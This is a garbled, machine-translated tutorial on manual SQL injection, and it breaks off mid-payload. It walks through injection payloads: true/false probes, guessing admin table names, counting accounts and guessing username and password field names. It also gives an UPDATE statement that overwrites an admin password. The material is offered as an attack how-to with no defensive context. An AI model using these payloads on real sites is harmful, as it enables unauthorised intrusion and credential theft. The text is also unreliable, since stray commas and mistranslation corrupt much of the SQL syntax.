手动注入（Manual injection）.doc

手动注入（Manual injection） Content: 1. to determine whether there is a SQL injection vulnerability Plus Plus and 1=1 Plus and 1=2 2.SQL query And 1=1 1=2 And exists (select * from admin) And exists (select, username, from, admin) And exists (select, passwore, from, admin) Order by 20 Union, select, 1,2,3,4, from, admin The most commonly used SQL query syntax: SELECT [column name] [column name 2] FROM [table name] WHERE [restrictive conditions] Cases: SELECT * FROM Dv_User Where UserID=1 Represents all the information about query UserID 1. To update： [UPDATE] SET [table name column name]= new value WHERE [restrictive conditions] Examples: UPDATE, Dv_User, set, [UserPassword]=, 965eb72c92a549dd, WHERE, UserName=, admin,... This statement will put the Dv_User in the UserName table for the line for admin UserPassword value 965eb72c92a549dd. Delete: DELETE FROM [table name] WHERE [restrictive conditions] Examples: DELETE, FROM, Dv_User, WHERE, UserName=, test Delete the row where the user name is test from the Dv_User table ======================================================================================================================================================================= =========== 1. to determine whether the injection point ; and, 1=1, and, 1=2 2. guessing tables: common tables: admin, adminuser, user, pass, password, and so on And 0 (select count (*) from *) And 0 (select count (*) from, admin) - determine whether there is a table of admin 3., guess the number of accounts, if you encounter 0, return the correct page, 1 return error page, indicating that the number of accounts is 1 And 0 (select count (*) from admin) And 1 (select count (*) from admin) 4. guess the field name in the len () bracket, plus the name of the field we think of And, 1= (select, count (*), from, admin, where, len (*) 0) - And, 1= (select, count (*), from, admin, where, len (user field name name) 0) And, 1= (select, count (*), from, admin, where, len (_blank, password field name, p